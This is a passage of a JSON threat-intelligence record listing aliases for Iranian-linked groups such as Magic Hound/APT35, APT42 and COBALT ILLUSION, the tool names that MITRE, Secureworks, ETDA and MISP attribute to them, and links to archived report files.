			"main_name": "Magic Hound",
			"aliases": [
				"Magic Hound",
				"TA453",
				"COBALT ILLUSION",
				"Charming Kitten",
				"ITG18",
				"Phosphorus",
				"APT35",
				"Mint Sandstorm"
			],
			"source_name": "MITRE:Magic Hound",
			"tools": [
				"Impacket",
				"CharmPower",
				"FRP",
				"Mimikatz",
				"Systeminfo",
				"ipconfig",
				"netsh",
				"PowerLess",
				"Pupy",
				"DownPaper",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03",
			"created_at": "2025-08-07T02:03:24.746965Z",
			"updated_at": "2026-04-10T02:00:03.640335Z",
			"deleted_at": null,
			"main_name": "COBALT ILLUSION",
			"aliases": [
				"APT35 ",
				"APT42 ",
				"Agent Serpens Palo Alto",
				"Charming Kitten ",
				"CharmingCypress ",
				"Educated Manticore Checkpoint",
				"ITG18 ",
				"Magic Hound ",
				"Mint Sandstorm sub-group ",
				"NewsBeef ",
				"Newscaster ",
				"PHOSPHORUS sub-group ",
				"TA453 ",
				"UNC788 ",
				"Yellow Garuda "
			],
			"source_name": "Secureworks:COBALT ILLUSION",
			"tools": [
				"Browser Exploitation Framework (BeEF)",
				"MagicHound Toolset",
				"PupyRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "0b212c43-009a-4205-a1f7-545c5e4cfdf8",
			"created_at": "2025-04-23T02:00:55.275208Z",
			"updated_at": "2026-04-10T02:00:05.270553Z",
			"deleted_at": null,
			"main_name": "APT42",
			"aliases": [
				"APT42"
			],
			"source_name": "MITRE:APT42",
			"tools": [
				"NICECURL",
				"TAMECAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f",
			"created_at": "2022-10-25T16:07:23.83826Z",
			"updated_at": "2026-04-10T02:00:04.761303Z",
			"deleted_at": null,
			"main_name": "Magic Hound",
			"aliases": [
				"APT 35",
				"Agent Serpens",
				"Ballistic Bobcat",
				"Charming Kitten",
				"CharmingCypress",
				"Cobalt Illusion",
				"Cobalt Mirage",
				"Educated Manticore",
				"G0058",
				"G0059",
				"Magic Hound",
				"Mint Sandstorm",
				"Operation BadBlood",
				"Operation Sponsoring Access",
				"Operation SpoofedScholars",
				"Operation Thamar Reservoir",
				"Phosphorus",
				"TA453",
				"TEMP.Beanie",
				"Tarh Andishan",
				"Timberworm",
				"TunnelVision",
				"UNC788",
				"Yellow Garuda"
			],
			"source_name": "ETDA:Magic Hound",
			"tools": [
				"7-Zip",
				"AnvilEcho",
				"BASICSTAR",
				"CORRUPT KITTEN",
				"CWoolger",
				"CharmPower",
				"ChromeHistoryView",
				"CommandCam",
				"DistTrack",
				"DownPaper",
				"FRP",
				"Fast Reverse Proxy",
				"FireMalv",
				"Ghambar",
				"GoProxy",
				"GorjolEcho",
				"HYPERSCRAPE",
				"Havij",
				"MPK",
				"MPKBot",
				"Matryoshka",
				"Matryoshka RAT",
				"MediaPl",
				"Mimikatz",
				"MischiefTut",
				"NETWoolger",
				"NOKNOK",
				"PINEFLOWER",
				"POWERSTAR",
				"PowerLess Backdoor",
				"PsList",
				"Pupy",
				"PupyRAT",
				"SNAILPROXY",
				"Shamoon",
				"TDTESS",
				"WinRAR",
				"WoolenLogger",
				"Woolger",
				"pupy",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1efe328c-7bda-49d8-82bf-852d220110ae",
			"created_at": "2026-01-22T02:00:03.661882Z",
			"updated_at": "2026-04-10T02:00:03.917703Z",
			"deleted_at": null,
			"main_name": "Educated Manticore",
			"aliases": [],
			"source_name": "MISPGALAXY:Educated Manticore",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434147,
	"ts_updated_at": 1775792160,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/982bf37657869a231fdb77ab613b2a3807389950.pdf",
		"text": "https://archive.orkl.eu/982bf37657869a231fdb77ab613b2a3807389950.txt",
		"img": "https://archive.orkl.eu/982bf37657869a231fdb77ab613b2a3807389950.jpg"
	}
}